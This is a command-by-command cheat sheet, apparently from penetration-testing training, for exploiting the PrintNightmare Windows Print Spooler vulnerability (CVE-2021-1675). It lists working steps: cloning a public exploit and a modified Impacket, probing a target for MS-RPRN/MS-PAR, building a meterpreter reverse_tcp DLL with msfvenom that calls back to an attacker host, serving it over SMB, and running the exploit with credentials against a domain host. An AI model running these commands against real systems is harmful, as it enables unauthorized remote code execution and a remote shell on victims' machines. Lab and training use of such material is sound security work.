PrintNightmare

PrintNightmare is a critical Windows vulnerability that allows remote code execution by exploiting the Windows Print Spooler service.

1. Clone PrintNightmare Exploit Repository

Command:

git clone https://github.com/cube0x0/CVE-2021-1675.git

• Description: Used to clone a PrintNightmare exploit using Git from a Linux-based host.

---

2. Install Required Impacket Version

Command:

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

• Description: Ensures the exploit author's (cube0x0) version of Impacket is installed. This also uninstalls any previous Impacket version on a Linux-based host.

---

3. Check if Target is Vulnerable

Command:

rpcdump.py @172.16.5.5 | egrep 'MS-RPRN|MSPAR'

• Description: Used to check if a Windows target has MS-PAR & MS-RPRN exposed from a Linux-based host.

---

4. Generate DLL Payload

Command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.129.202.111 LPORT=8080 -f dll > backupscript.dll

• Description: Used to generate a DLL payload to be used by the exploit to gain a shell session. Performed from a Windows-based host.

---

5. Host DLL Payload Using SMB Server

Command:

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

• Description: Used to create an SMB server and host a shared folder (CompData) at the specified location on the local Linux host. This can be used to host the DLL payload that the exploit will attempt to download to the host. Performed from a Linux-based host.

---

6. Execute the Exploit

Command:

sudo python3 CVE-2021-1675.py inlanefreight.local/<username>:<password>@172.16.5.5 '\\10.129.202.111\CompData\backupscript.dll'

• Description: Executes the exploit and specifies the location of the DLL payload. Performed from a Linux-based host.